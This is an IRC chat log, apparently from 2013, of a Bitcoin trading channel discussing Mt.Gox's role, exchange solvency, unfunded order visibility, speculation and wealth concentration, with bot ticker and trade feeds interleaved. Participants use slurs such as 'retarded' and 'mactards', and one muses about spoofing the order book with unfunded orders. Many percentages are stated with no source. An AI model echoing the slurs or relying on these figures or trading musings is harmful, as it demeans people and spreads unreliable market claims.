the most important venue. Mar 23 20:12:17 that figure is from 2 years ago isn't it Mar 23 20:12:26 it is Mar 23 20:12:26 its still over 70% Mar 23 20:12:39 long story short, with the house i was trying to sell for btc, i ended up getting a qualified renter who declined to use btc to pay rent Mar 23 20:12:42 tiberiusiv: I agree there has been a move to bunds. Mar 23 20:12:44 big news about cyprus.... a country with 300,000 citizens.... as a EU citizen nothing has changed for me during the last 5 years Mar 23 20:12:59 i would love to see what percentage of gox trades make up daily blockchain transactions Mar 23 20:13:09 it's all just FUD Mar 23 20:13:14 mjr_: watch bitcoin-monitor.com Mar 23 20:13:17 do gox trades even hit the chain? Mar 23 20:13:29 not sure, but gox is definitely the worst Mar 23 20:13:30 oh, no hyphen Mar 23 20:13:35 i thought their system traded internally until you pulled funds Mar 23 20:13:37 it exacerbates any price movements Mar 23 20:13:40 http://bitcoinmonitor.com Mar 23 20:13:45 [BTCTC] [BTC-BOND] 10 @ 0.009898 = 0.099 BTC [-] Mar 23 20:13:45 because of lag Mar 23 20:14:08 when people see price moves...they get in line for 10-120 seconds Mar 23 20:14:10 mjr mtgox doesnt make up a big % of the blockchain transactions Mar 23 20:14:13 and things change Mar 23 20:14:14 i don't understand why people use mtgox Mar 23 20:14:21 gox trandes do not hit the chain Mar 23 20:14:25 they are all internal Mar 23 20:14:26 ah ok Mar 23 20:14:32 [MPEX] [S.MPOE] 1300 @ 0.0006928 = 0.9006 BTC [-] Mar 23 20:14:33 another idiot chimes in. Mar 23 20:14:33 [MPEX] [S.MPOE] 1000 @ 0.00069279 = 0.6928 BTC [-] Mar 23 20:14:34 that is why the gox hack was reversible Mar 23 20:15:01 chmod755: at one point, i made a full switch to bitfloor, then they got robbed Mar 23 20:15:12 i use bitfloor Mar 23 20:15:17 pretty much exclusively Mar 23 20:15:17 and I suspect gox lag does contribute to instability Mar 23 20:15:22 bitfloor is insolvent Mar 23 20:15:31 well...i bought coins there Mar 23 20:15:33 llticker Mar 23 20:15:33 and moved them around Mar 23 20:15:37 so one guy thinks mtgox is a gas station, another that mt gox trades occur on the blockchain and a third who thinks gribble sets the price. Mar 23 20:15:39 wtf is bitfloor Mar 23 20:15:40 so solvent enough for my needs Mar 23 20:15:43 intellect hour in here today Mar 23 20:15:47 dude, another crash is on the way Mar 23 20:15:53 but arent 'all of the other exchanges" basing decsisions on gox? Mar 23 20:15:53 of course not thickasthieves Mar 23 20:15:53 gox does NOT set bitcoin prices for everyone Mar 23 20:15:55 mjr: sure your needs, what 0.2btc ? lol Mar 23 20:16:07 100's Mar 23 20:16:14 [14:12] of course its the most important venue. Mar 23 20:16:19 smickles, it's your choice to trust a web service with your coins..... Mar 23 20:16:24 thickasthieves the exchanges do not base their decisions on gox lol. Mar 23 20:16:31 i use them to buy coins not hold coins Mar 23 20:16:33 gox just has the most participants Mar 23 20:16:38 which last i checked is what exchanges were for Mar 23 20:16:42 when i say 'exchange' you know i mean in the abstract right? Mar 23 20:16:43 tiberiusiv: you may have misunderstood me Mar 23 20:16:46 thickasthives just be quiet. you are stupid Mar 23 20:16:55 as in buyers, bots, sellers, etc Mar 23 20:17:14 ... Mar 23 20:17:25 if you can't see the gas station analogy as price advertising Mar 23 20:17:29 then you are retarded Mar 23 20:17:32 tiberiusiv, gribble sets the price. << that's true. he's one of the richest bots on the entire internet Mar 23 20:17:46 no gas station would say $20 a gallon, when across the street it says $5 a gallon Mar 23 20:18:09 competing markets drive everyone to a certain price set by the market Mar 23 20:18:23 its called price discovery and we are undertaking that right now Mar 23 20:18:41 btc-e has cheaper prices than gox... Mar 23 20:18:45 bitfloor has higher Mar 23 20:18:55 gox has lag! Mar 23 20:19:04 but that is only because of market inefficiencies Mar 23 20:19:05 ;;ticker Mar 23 20:19:06 BTCUSD ticker | Best bid: 61.70568, Best ask: 61.70569, Bid-ask spread: 0.00001, Last trade: 61.70569, 24 hour volume: 161828.11644717, 24 hour low: 52.34560, 24 hour high: 72.35000, 24 hour vwap: 63.81619 Mar 23 20:19:10 eek! Mar 23 20:19:10 ;;goxlag Mar 23 20:19:10 0 seconds Mar 23 20:19:35 calm before the storm Mar 23 20:19:40 lol Mar 23 20:19:51 gox is a standard because a standard was needed to let the market work better Mar 23 20:20:10 tiberiusiv: what's your point about price discovery and gox? I think i missed it and i don't want to read the log Mar 23 20:20:14 errr well the majority of coins are not on gox Mar 23 20:20:15 coming soon: 24 hour low: 5.234560, 24 hour high: 723.5000 Mar 23 20:20:32 splnkr: oh i hope so Mar 23 20:20:36 lol Mar 23 20:20:54 gets ready to buy at 5 before it hits $700 Mar 23 20:21:14 ThickAsThieves, so what would happen if gox had a huge security issue.... Mar 23 20:21:44 like even big services like FB and Google are not 100% secure Mar 23 20:22:03 same thing as last time Mar 23 20:22:06 mega crash Mar 23 20:22:22 we havent learned i guess Mar 23 20:22:23 then mega recovery Mar 23 20:22:33 yay roller coaster rides Mar 23 20:22:46 day traders boggle me...all you do is make the exchanges rich Mar 23 20:22:58 is bitcoin valuable as an idea? yes Mar 23 20:23:17 bitcoin is valuable in my bank account too Mar 23 20:23:21 ThickAsThieves, i think if more people traded on other exchanges it would allow them to make their services more secure and stuff (with fees, etc) Mar 23 20:23:37 its the network effect Mar 23 20:23:49 every user at gox gives a positive externality Mar 23 20:23:49 sadly when you try supporting other exchanges, all they do is fuck it up Mar 23 20:23:52 here is how it workd Mar 23 20:23:55 works Mar 23 20:24:08 1) make your exchange secure. then 2) I will trade on it Mar 23 20:24:14 ThickAsThieves, bitcoin central never had a problem Mar 23 20:24:19 as an example Mar 23 20:24:32 like a serious problem Mar 23 20:24:40 gox probably has the best security right now, due to their previous issues and their capitalization. Mar 23 20:24:44 they are not US though are they? Mar 23 20:24:47 ;;ticker Mar 23 20:24:47 BTCUSD ticker | Best bid: 60.60000, Best ask: 61.30162, Bid-ask spread: 0.70162, Last trade: 60.60000, 24 hour volume: 162492.76340264, 24 hour low: 52.34560, 24 hour high: 72.35000, 24 hour vwap: 63.80453 Mar 23 20:24:53 ThickAsThieves, mtgox is not in the US Mar 23 20:24:59 coinlab is Mar 23 20:25:01 but the deal in USD Mar 23 20:25:04 and dwolla Mar 23 20:25:09 coinlab is a major threat Mar 23 20:25:11 ThickAsThieves, i think they also do USD Mar 23 20:25:26 coinlab? gox's partners? Mar 23 20:25:27 and they're almost as old as mtgox Mar 23 20:25:28 50% chance they fuck this up Mar 23 20:25:50 coinlab has no experience in the big leagues Mar 23 20:25:55 i agree Mar 23 20:25:58 https://bitcoin-central.net/order_book Mar 23 20:26:05 as far as the current dip i'd point to this http://online.wsj.com/article/SB10001424127887324373204578374611351125202.html Mar 23 20:26:34 while we are talking about this...someone said that you could place multiple orders on gox ie. with $1000 i can place $1000 orders at multiple price points Mar 23 20:26:35 i believe that was late-breaking news yesterday Mar 23 20:26:42 splnkr: This is just a speculative pullback. Not related to WSJ Mar 23 20:26:55 [BTCTC] [BTC-BOND] 26 @ 0.009898 = 0.2573 BTC [-] Mar 23 20:26:59 mjr_, wtf? Mar 23 20:27:08 mjr_: yes, but only what you have will get filled Mar 23 20:27:41 the irony is that lesser exchanges must match gox price to have a fair chance of getting enough users to not rely on gox Mar 23 20:27:46 I'm not sure if all will display on the order chart if you don't have the funds Mar 23 20:27:47 [BTCTC] [BTC-BOND] 44 @ 0.009899 = 0.4356 BTC [+] Mar 23 20:27:57 cant use bitcoincentral when they wasnt such a premium in USD Mar 23 20:28:01 want Mar 23 20:28:13 ThickAsThieves: first mover advantage. S.DICE will never be beaten by a clone either Mar 23 20:29:02 ThickAsThieves it is NOT bitcoincentral's premium Mar 23 20:29:11 yeah, so you are sending manipulative signals into the market Mar 23 20:29:27 i can make the order book look really really thick Mar 23 20:29:31 and then pull the plug Mar 23 20:29:31 it's just cause there are more buyers and less sellers there, so to speak Mar 23 20:29:33 mjr_: I don't think so Mar 23 20:29:49 thats the problem at campbx too Mar 23 20:29:50 I can test it right now Mar 23 20:29:51 hang on Mar 23 20:29:52 if i can place an order...i can cancel that order Mar 23 20:30:14 Bugpowder, game idea: bernankeDICE - bloat bank databases with small bank transactions! Mar 23 20:30:37 chmod755: great idea! Mar 23 20:30:54 except theyll get ya on fees Mar 23 20:30:55 wow. The gox bid ask are soooo far off right now Mar 23 20:30:58 64.5 Mar 23 20:30:59 lol Mar 23 20:31:05 did it work? Mar 23 20:31:06 ;;ticker Mar 23 20:31:07 BTCUSD ticker | Best bid: 61.51000, Best ask: 61.99000, Bid-ask spread: 0.48000, Last trade: 62.00001, 24 hour volume: 164600.00323438, 24 hour low: 52.34560, 24 hour high: 72.35000, 24 hour vwap: 63.77672 Mar 23 20:31:09 ThickAsThieves, i think even $5 difference in exchange rate is insignificant in the long run Mar 23 20:31:12 ThickAsThieves, just make a minimum on the bets Mar 23 20:31:13 give me a minute Mar 23 20:31:28 lets do it then Mar 23 20:31:33 lmao Mar 23 20:31:39 what that is called, by the way, is Soft Buying Power Mar 23 20:31:46 i don't have a bank account in the US tho Mar 23 20:31:48 it does sound like a good idea on the surface Mar 23 20:31:50 that is the limit to how many orders you can place Mar 23 20:31:51 lmao Mar 23 20:32:00 Hard buying power is the limit to how many orders you can have filled Mar 23 20:32:16 ThickAsThieves, i could do something like that in Europe Mar 23 20:32:23 usually those numbers should be the same or maybe soft bp slightly higher Mar 23 20:32:24 my bank would be surprised Mar 23 20:32:34 lol 1000 transactions of 1EUR? Mar 23 20:32:37 XD Mar 23 20:32:47 thats nothing to them Mar 23 20:32:47 merkelDICE? Mar 23 20:32:52 lmao Mar 23 20:32:53 happens all the time Mar 23 20:33:08 you;d need a serious scheme Mar 23 20:33:14 ya, but if it changes from like a few tx per month Mar 23 20:33:17 anyways, my point is that gox is probably a horrible signal to listen to Mar 23 20:33:35 at least from a depth perspective Mar 23 20:33:35 mjr_, i prefer listening to music Mar 23 20:33:37 yet its still the best Mar 23 20:33:47 most used != best Mar 23 20:33:54 actually Mar 23 20:34:01 why isnt there in index being used Mar 23 20:34:02 see betamax vs vhs Mar 23 20:34:11 that is the obvious solution... Mar 23 20:34:17 ThickAsThieves, did you try exchanges? Mar 23 20:34:21 *all Mar 23 20:34:27 obv not Mar 23 20:34:33 http://bitcoincharts.com/markets/ Mar 23 20:34:37 why not use that Mar 23 20:34:54 get an index going from otc Mar 23 20:34:57 weight them all Mar 23 20:35:02 on a small exchange my money is more powerful! Mar 23 20:35:03 avg Mar 23 20:35:03 XD Mar 23 20:35:51 [MPEX] [O.BTCUSD.C610T] 10 @ 0.0807819 = 0.8078 BTC [-] Mar 23 20:36:04 This is weighted. Mar 23 20:36:05 http://bitcoincharts.com/markets/currencies/ Mar 23 20:36:27 yes, it is more accurate...but still subjective somewhat Mar 23 20:36:40 because you basically choose what to include Mar 23 20:36:47 otc is a good price signal i think Mar 23 20:37:17 http://bitcoincharts.com/charts/volumepie/ << should add a pie of exchanges too (not only exchanges per currency and currencies) Mar 23 20:37:43 i agree Mar 23 20:38:10 Bugpowder: can you place more orders than you have BP for? Mar 23 20:38:17 so we have lotsa good data Mar 23 20:38:19 goxlag is delaying Mar 23 20:38:20 plus oix Mar 23 20:38:24 I placed them, they are pending Mar 23 20:38:24 someone make an index Mar 23 20:38:47 gah, i hate gox Mar 23 20:38:55 make that index have the best sockets or whatever Mar 23 20:39:01 if i had my choice i would buy on btc-e and sell on bitfloor Mar 23 20:39:04 and become the standard Mar 23 20:39:05 all day long Mar 23 20:39:17 mjr_ I have the answer Mar 23 20:39:28 You can place more bids than you have funds for Mar 23 20:39:35 yes Mar 23 20:39:38 i know Mar 23 20:39:40 BUT Mar 23 20:39:57 the suspense is killing me Mar 23 20:40:10 The bids you don't have funds for are not listed on the order book, starting from the lowest price down. Mar 23 20:40:26 wait... Mar 23 20:40:35 on a buy order or sell? Mar 23 20:40:51 do they put the orders closest to top of the book or furthest Mar 23 20:41:00 So I placed a set of bids at 45-50, and by bids at 30 and 35 that I no longer have funds for disappear from the order bood Mar 23 20:41:03 book Mar 23 20:41:33 but they are still listed on my own page as existing but unfunded. Mar 23 20:41:42 does that include api? Mar 23 20:41:51 ie. goxlive charts etc Mar 23 20:41:55 what is the order book json? Mar 23 20:42:01 hold on Mar 23 20:42:33 there site is slow too Mar 23 20:44:26 https://data.mtgox.com/api/0/data/getDepth.php?Currency=USD Mar 23 20:45:46 http://data.mtgox.com/api/1/BTCUSD/depth/fetch Mar 23 20:47:11 THE order book json? Mar 23 20:47:15 $depth Mar 23 20:47:17 smickles: http://pastebin.com/raw.php?i=hRPB9a5i Mar 23 20:47:19 ;D Mar 23 20:47:34 [MPEX] [S.MPOE] 1300 @ 0.0006928 = 0.9006 BTC [+] Mar 23 20:47:36 [MPEX] [S.MPOE] 5771 @ 0.00069279 = 3.9981 BTC [-] Mar 23 20:47:49 mjr_: those are incomplete Mar 23 20:47:57 yes i saw Mar 23 20:48:06 not sure where the complete book is Mar 23 20:49:03 not sure if they show it, but the end result is that there will be changes in the book that may not be expected Mar 23 20:49:17 especially if someone is running a bot and market making Mar 23 20:50:50 OK I confirmed it on clarkmoody Mar 23 20:51:01 the unfunded bids don't display Mar 23 20:51:01 it disappears? Mar 23 20:51:03 yes Mar 23 20:51:06 ah ok Mar 23 20:51:12 not that bad then Mar 23 20:51:18 and the partially funded one shows up as 92.39 BTC instead of 100 BTC Mar 23 20:51:35 same with asks i am assuming Mar 23 20:52:18 ;;calc 75/(1-.032) Mar 23 20:52:18 77.479338843 Mar 23 20:52:26 ;;ticker Mar 23 20:52:26 BTCUSD ticker | Best bid: 62.52000, Best ask: 63.64999, Bid-ask spread: 1.12999, Last trade: 63.64999, 24 hour volume: 165216.67676446, 24 hour low: 52.34560, 24 hour high: 71.99000, 24 hour vwap: 63.76409 Mar 23 20:52:27 almost certainly Mar 23 20:52:40 $vwap ^oix Mar 23 20:52:41 smickles: 1 day: no data 7 day: average: 67.50549924 high: 70.00595985 low: 51.26011131 volume: 14615 btc: 3124.38329456 30 day: no data Mar 23 20:57:55 [BTCTC] [GSDPT] 1 @ 0.00463 BTC [-] Mar 23 21:03:57 $depth c750t Mar 23 21:03:58 smickles: O.BTCUSD.C750T Bids: ['11 @ 0.03308446', '1000 @ 0.00823144'] Mar 23 21:03:59 smickles: Asks: ['13 @ 0.04908448', '1000 @ 0.05281501'] Mar 23 21:04:49 ;;calc 75/(1-.033) Mar 23 21:04:50 77.5594622544 Mar 23 21:05:12 $vwap oix Mar 23 21:05:13 smickles: ^OIX 1 day: no data 7 day: average: 67.50549924 high: 70.00595985 low: 51.26011131 volume: 14615 btc: 3124.38329456 30 day: no data Mar 23 21:06:29 http://i.imgur.com/sHLF27s.jpg Mar 23 21:06:32 hilarious Mar 23 21:06:41 and we find 120 seconds lag frustrating Mar 23 21:06:45 ;;bc,stats Mar 23 21:06:47 Current Blocks: 227645 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 162 blocks | Next Difficulty In About: 18 hours, 25 minutes, and 35 seconds | Next Difficulty Estimate: 6615572.09208 | Estimated Percent Change: 36.46975 Mar 23 21:08:05 [HAVELOCK] [SDICE] 8 @ 0.509 = 4.072 BTC [+] Mar 23 21:11:04 [HAVELOCK] [SDICE] 9 @ 0.509 = 4.581 BTC [+] Mar 23 21:12:04 [HAVELOCK] [SDICE] 6 @ 0.509 = 3.054 BTC [+] Mar 23 21:13:12 heh, goat is asking me about my offer to help people short s.mpoe Mar 23 21:13:18 $depth mpoe Mar 23 21:13:19 smickles: S.MPOE Bids: ['8990 @ 0.00069279', '5000 @ 0.00068222', '10000 @ 0.00068141', '4062 @ 0.00068033', '13500 @ 0.00067591'] Mar 23 21:13:20 smickles: Asks: ['1300 @ 0.00070068', '732 @ 0.00070069', '1300 @ 0.00070069', '22678 @ 0.0007007', '26444 @ 0.00070184'] Mar 23 21:14:03 [HAVELOCK] [SDICE] 56 @ 0.509 = 28.504 BTC [+] Mar 23 21:14:05 ;;goxlag Mar 23 21:14:05 4.446135 seconds Mar 23 21:14:44 [BTCTC] [ASICMINER-PT] 2 @ 0.80698 = 1.614 BTC [-] Mar 23 21:14:47 [BTCTC] [ASICMINER-PT] 1 @ 0.80755 BTC [+] Mar 23 21:14:50 [BTCTC] [ASICMINER-PT] 4 @ 0.80769 = 3.2308 BTC [+] Mar 23 21:14:52 [BTCTC] [ASICMINER-PT] 10 @ 0.8077 = 8.077 BTC [+] Mar 23 21:14:56 [BTCTC] [ASICMINER-PT] 5 @ 0.8077 = 4.0385 BTC [+] Mar 23 21:14:58 [BTCTC] [ASICMINER-PT] 20 @ 0.80945 = 16.189 BTC [+] Mar 23 21:15:01 [BTCTC] [ASICMINER-PT] 10 @ 0.80947 = 8.0947 BTC [+] Mar 23 21:15:03 [BTCTC] [ASICMINER-PT] 1 @ 0.83 BTC [+] Mar 23 21:15:06 [BTCTC] [ASICMINER-PT] 4 @ 0.835 = 3.34 BTC [+] Mar 23 21:15:07 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC [+] Mar 23 21:15:10 [BTCTC] [ASICMINER-PT] 1 @ 0.845 BTC [+] Mar 23 21:15:37 someone is hungry for some AM Mar 23 21:16:32 [BTCTC] [ASICMINER-PT] 8 @ 0.8517 = 6.8136 BTC [+] Mar 23 21:16:57 mjr_: Joe Reddit mad at coin base. No sympathy here. Mar 23 21:18:53 regarding coinbase, what can you expect from mactards Mar 23 21:19:05 [MPEX] [S.MPOE] 1300 @ 0.00070068 = 0.9109 BTC [+] Mar 23 21:19:07 [MPEX] [S.MPOE] 732 @ 0.00070069 = 0.5129 BTC [+] Mar 23 21:19:09 [MPEX] [S.MPOE] 1300 @ 0.00070069 = 0.9109 BTC [+] Mar 23 21:19:18 producing nice design and poor code? Mar 23 21:19:23 [MPEX] [S.MPOE] 7668 @ 0.0007007 = 5.373 BTC [+] Mar 23 21:19:40 yes bootstrap is not too bad Mar 23 21:20:27 hackers should do code, finance people should do finance and mactards can go play in the sandbox Mar 23 21:21:36 and kakobrekla should do kakobrekla! Mar 23 21:24:54 yeah ill self do myself with self Mar 23 21:25:35 [MPEX] [S.MPOE] 15010 @ 0.0007007 = 10.5175 BTC [+] Mar 23 21:25:37 [MPEX] [S.MPOE] 26444 @ 0.00070184 = 18.5595 BTC [+] Mar 23 21:25:40 [MPEX] [S.MPOE] 5646 @ 0.00070741 = 3.994 BTC [+] Mar 23 21:26:59 ;;ticker Mar 23 21:26:59 BTCUSD ticker | Best bid: 61.40136, Best ask: 61.50110, Bid-ask spread: 0.09974, Last trade: 61.50109, 24 hour volume: 167094.40968927, 24 hour low: 52.34560, 24 hour high: 71.79900, 24 hour vwap: 63.67427 Mar 23 21:27:44 falling again Mar 23 21:32:57 ;;asks 70 Mar 23 21:33:00 There are currently 8894.1816 bitcoins offered at or under 70.0 USD, worth 602226.070138 USD in total. | Data vintage: 0.0026 seconds Mar 23 21:33:06 still a chance we'll see 70 again before Monday Mar 23 21:33:11 dude Mar 23 21:33:15 we will see 70 soon Mar 23 21:33:27 sunday night, when the wires start clearing Mar 23 21:33:31 I think Mar 23 21:33:31 and then 66 again Mar 23 21:33:33 hehe Mar 23 21:33:38 but who knows Mar 23 21:33:54 i do think a bump is incoming Mar 23 21:34:02 new ATH Mar 23 21:34:17 yes i jinxed it Mar 23 21:34:58 bugpowder: wires clearing has nothing to do with anything. Mar 23 21:35:24 first off bidders would already have been buying BTC, just to flip them to the new buyers if "wires clearing" bs. was true Mar 23 21:35:48 amazing the level of ignorance of users. Mar 23 21:36:30 my name is tiberius and everything you say has nothing to do with anything Mar 23 21:36:31 any new demand that is held up by technicalities is already priced in Mar 23 21:37:03 people love to rationalize and explain away why something is at X price Mar 23 21:37:09 and where it "should be" Mar 23 21:37:28 thats what traders do Mar 23 21:37:43 yes and theres a reason 99% of them lose Mar 23 21:37:56 99%? Mar 23 21:38:02 yes Mar 23 21:38:14 he meant 9900% Mar 23 21:38:15 1% of traders are profitable in the long term Mar 23 21:38:21 even on wallstreet Mar 23 21:38:25 like everyone but him basically Mar 23 21:38:26 traders of what, exactly? Mar 23 21:38:33 anything Mar 23 21:38:45 for example majority of fund managers cannot even beat the Sp500 Mar 23 21:38:57 look it up Mar 23 21:39:16 we all die in the end Mar 23 21:39:21 trading is 0 sum, for someone to make money there has to be a loser Mar 23 21:39:33 theres a reason why its the same people making the $ over and over Mar 23 21:39:36 and very few of them Mar 23 21:39:38 [MPEX] [S.MPOE] 1300 @ 0.0007074 = 0.9196 BTC [-] Mar 23 21:39:39 [MPEX] [S.MPOE] 203 @ 0.00070741 = 0.1436 BTC [+] Mar 23 21:39:41 [MPEX] [S.MPOE] 6755 @ 0.00070741 = 4.7786 BTC [+] Mar 23 21:39:49 because they speculate correctly? Mar 23 21:39:57 [MPEX] [S.MPOE] 8142 @ 0.00071369 = 5.8109 BTC [+] Mar 23 21:40:01 look at the bitcoin crowd for example, less then 1% of thetotal "community" contributes anything Mar 23 21:40:12 its like what 20-30 individuals running services? Mar 23 21:40:41 are any of them making money? Mar 23 21:40:48 so it will be a natural tendancy even in bitcoin for 1% to have all the wealth Mar 23 21:40:50 tiberiusiv: you are confusing an efficient market with the mtgox market. Mar 23 21:40:55 and 99% to have little Mar 23 21:41:05 The tendency for downward moves during the weekend is real. Mar 23 21:41:29 in bitcoin at the moment, about 20% of the users control 80% of the coins Mar 23 21:41:33 the events of the week can probably amplify or dampen that effect as well Mar 23 21:41:40 5% of the users control 50% Mar 23 21:41:43 tiberiusiv: that is true in all things Mar 23 21:41:52 zipf distribution Mar 23 21:41:53 yup Mar 23 21:42:17 at least in bitcoin the tail won't be too long Mar 23 21:42:28 since bitcoin has no bailout mechanism, alot of idiotic users ie those that use their coins wrecklessly drop out Mar 23 21:42:45 lending bitcoins for example to people who sell them for fiat, you will lose Mar 23 21:43:23 in the end i would say 1-2% of bitcoiners will control 80%+ of BTC Mar 23 21:43:38 with the remaining 20% being fought over by the 99% percenters Mar 23 21:43:47 i will concede that generally buying and holding has been the safest way to invest in bitcoin and make profit Mar 23 21:44:03 you havent made a profit until youve realized it. Mar 23 21:44:09 until then its a paper gain Mar 23 21:44:15 indeed Mar 23 21:44:25 its mathematically impossible for even 5% of total bitcoiners to all cashout Mar 23 21:44:32 so that gets people seeking dividends Mar 23 21:44:49 100k which is 1% of bitcoins in circulation would collapse the price temporarily into the 30's Mar 23 21:44:56 so imagine 5% Mar 23 21:45:28 thickasthieves: the reality is that there are barely any viable bitcoin derived income producers Mar 23 21:45:42 the only 2 currently are miners and gambling/speculative business's Mar 23 21:46:31 they are the most popular as well I think Mar 23 21:46:38 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC [-] Mar 23 21:46:40 [BTCTC] [ASICMINER-PT] 1 @ 0.771 BTC [-] Mar 23 21:46:42 [BTCTC] [ASICMINER-PT] 9 @ 0.771 = 6.939 BTC [-] Mar 23 21:46:45 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [-] Mar 23 21:46:47 [BTCTC] [ASICMINER-PT] 4 @ 0.763 = 3.052 BTC [-] Mar 23 21:46:49 [BTCTC] [ASICMINER-PT] 1 @ 0.76201 BTC [-] Mar 23 21:46:49 because all other business's are not viable Mar 23 21:46:50 [BTCTC] [ASICMINER-PT] 9 @ 0.761102 = 6.8499 BTC [-] Mar 23 21:46:53 [BTCTC] [ASICMINER-PT] 11 @ 0.761102 = 8.3721 BTC [-] Mar 23 21:48:29 mining doesn't seem viable to me anymore Mar 23 21:48:52 Most of minings thing end up being a losing proposition it seems. Mar 23 21:49:05 [HAVELOCK] [VTX] 1 @ 0.63 BTC [-] Mar 23 21:49:06 [HAVELOCK] [VTX] 1 @ 0.64 BTC [+] Mar 23 21:49:11 thats how it is with metals too Mar 23 21:49:30 ^ VTX Mar 23 21:49:37 out of the tens of thousands of metal miners, not even a handful are profitable Mar 23 21:49:38 It's also a Bitcoin derived income. Mar 23 21:50:04 as i said, speculation/gambling Mar 23 21:50:18 It's a currency exchange CAD <-> BTC Mar 23 21:50:34 yes that falls under speculation. Mar 23 21:50:58 Well that's not really speculation to me if it's for cashing out/buying some BTC Mar 23 21:51:02 90% of exchange volume is speculation, only 10% is for someone who actually needs BTC Mar 23 21:51:02 Except for daytraders Mar 23 21:51:05 [HAVELOCK] [SDICE] 1 @ 0.509 BTC [+] Mar 23 21:51:16 you realize its maybe 10% who are cashing in and out? Mar 23 21:51:34 cashing in to hold BTC is speculation Mar 23 21:51:46 cashing in to buy BTC to trade for something else is not Mar 23 21:52:07 Possibly Mar 23 21:52:10 theres only 2 things you really need BTC for if you want to spend, silkroad and gambling Mar 23 21:52:15 I think most of the current price is speculation Mar 23 21:52:23 anything else its cheaper to use fiat Mar 23 21:52:49 yeah, for that Mar 23 21:53:04 Which is what makes me think the whole current price is mostly speculation Mar 23 21:53:17 what % of the price is speculation tho Mar 23 21:53:22 Merchants accepting Bitcoins don't get good results it seems Mar 23 21:53:31 all markets in the world are speculative in nature Mar 23 21:53:31 and there's not legit BTC spenders Mar 23 21:53:37 not enough* Mar 23 21:53:41 are you aware 95% of oil contracts are speculators? Mar 23 21:53:48 there doesnt have to be Mar 23 21:54:02 theres no reason to spend BTC on anything other then SK or gambling Mar 23 21:54:15 [MPEX] [S.MPOE] 1300 @ 0.0006928 = 0.9006 BTC [-] Mar 23 21:54:17 [MPEX] [S.MPOE] 8990 @ 0.00069279 = 6.2282 BTC [-] Mar 23 21:54:22 theres nothing wrong with speculation. Mar 23 21:54:28 [MPEX] [S.MPOE] 5000 @ 0.00068222 = 3.4111 BTC [-] Mar 23 21:54:30 [MPEX] [S.MPOE] 2510 @ 0.00068141 = 1.7103 BTC [-] Mar 23 21:54:39 tahts speculation Mar 23 21:54:50 let me give you a simple example Mar 23 21:55:01 suppose you want to purchase a $1k laptop Mar 23 21:55:12 a chromebook plz Mar 23 21:55:13 are you going to want to get rid of your BTC or your Fiat first? Mar 23 21:55:28 fiat Mar 23 21:55:37 http://en.wikipedia.org/wiki/Gresham's_law Mar 23 21:56:18 you want to get rid of the "bad" money first Mar 23 21:56:58 thats why any business selling goods that can be obtained with fiat will not be successful. Mar 23 21:57:28 thats a bit general Mar 23 21:57:39 you will see it progress Mar 23 21:57:59 hence why illegal activites work so well with BTC Mar 23 21:58:05 wouldn't ya know it. I go to spend some bitcoins, and the product is on backorder :| Mar 23 21:58:18 I tried lending and it burned. I tried buying/flipping/holding stocks and it's a huge success. I tried options but I'm kind of failing at that. Mar 23 21:58:36 Good selection of BTC stocks seems to be the way to go. Mar 23 21:58:49 namworld: you can only lend BTC to people/entities that have BTC derived income Mar 23 21:58:57 There's less than 25% of what's available that's actually good/interesting at all tho. Mar 23 21:59:05 It was lent to a miner... Mar 23 21:59:08 which is not even 5 people at this point Mar 23 21:59:20 or reputable miners Mar 23 21:59:34 not even 5 people??? Mar 23 21:59:43 He was reputable Mar 23 21:59:46 well who has become based incomes? Mar 23 21:59:57 me, kakobrekla, mircea_popescu, ukto Mar 23 22:00:03 just off my head Mar 23 22:00:07 Gigavps paid, amazingrando defaulted. Mar 23 22:00:08 and satoshi dice Mar 23 22:00:20 yea evoorhees, burnside Mar 23 22:00:24 jurov try hard to name more you wont. Mar 23 22:00:28 They were the two largest public miners. Mar 23 22:00:35 slush Mar 23 22:00:44 eleuthria Mar 23 22:00:53 jeff/gavin Mar 23 22:01:08 how do they have a bTC income? Mar 23 22:01:31 at least one of them gets salary from btc foundation Mar 23 22:01:43 plus mining Mar 23 22:01:58 as i said, we are at 0.001% of total users? Mar 23 22:02:00 if not less Mar 23 22:02:11 have debt servicing capability? Mar 23 22:02:12 okay but not "less than 5" Mar 23 22:02:23 ok fine 12 :) Mar 23 22:02:36 i'm playing a drinking game, every time tiberius quotes a % with authority Mar 23 22:02:43 XX Mar 23 22:02:45 which is a statistical 0 when compared to the 100k+ BTC users Mar 23 22:02:50 archive.org employees (they didn't disclose how much it's yet) Mar 23 22:03:30 lol thickasthieves Mar 23 22:03:42 :) Mar 23 22:04:17 thats why there is so many scammers, most borrowers are short selling BTC and posting nothing as collateral Mar 23 22:04:29 plus i'm sure there were other tens of people who mined in 2009-2011 and now their income is nicely boosted Mar 23 22:04:34 and then they cannot cover their shorts, ie come up with the fiat to buy BTC at 10x the price to repay a loan Mar 23 22:05:15 um, and what are we arguing about? i agree that 1% btc users control over 90% of everything Mar 23 22:05:31 drink! Mar 23 22:05:37 and 1% will end up with 90% of the coins Mar 23 22:05:40 well 80% Mar 23 22:05:41 and thet most of volume is gambling and speculation (often indistinguishable from each other) Mar 23 22:05:55 yes Mar 23 22:06:08 no, 90%. if i have btcs on blockchain.info, who controls them? Mar 23 22:06:34 i'd say they are under their control practically Mar 23 22:06:52 we arent argueing, i was simply explaining its impossible for a business that accepts BTC only to be viable against a fiat competitor Mar 23 22:07:12 people will always spend their bad money(fiat) first Mar 23 22:07:55 not if btc prices are cheaper Mar 23 22:08:06 its impossible for them to be. Mar 23 22:08:35 tiberiusiv: that's now how gresham's law works Mar 23 22:08:46 i know Mar 23 22:08:50 what if they run off loaned money and then achieve dominance Mar 23 22:08:52 we have plenty of externalities here Mar 23 22:09:10 jurov: nope in a fixed monetary system the prices will never be cheaper then fiat. Mar 23 22:09:12 (with lower prices) Mar 23 22:09:14 such as credit card taxes and regulatory bs in many areas Mar 23 22:09:30 if they are elided, btc prices can be lower there Mar 23 22:09:40 if you spent your bitcoins 3months ago on a new television, you just paid 300% more for it then paying with fiat Mar 23 22:09:46 won't happend with groceries, ofc Mar 23 22:10:14 the only way BTC is cheaper is if the business is completely BTC based Mar 23 22:10:21 meaning input costs are fully paid in BTC Mar 23 22:10:39 what about people getting "short" fiat and converting everything to btc? Mar 23 22:10:43 selling electronics and accepting BTC to sell for USD to pay suppliers, will 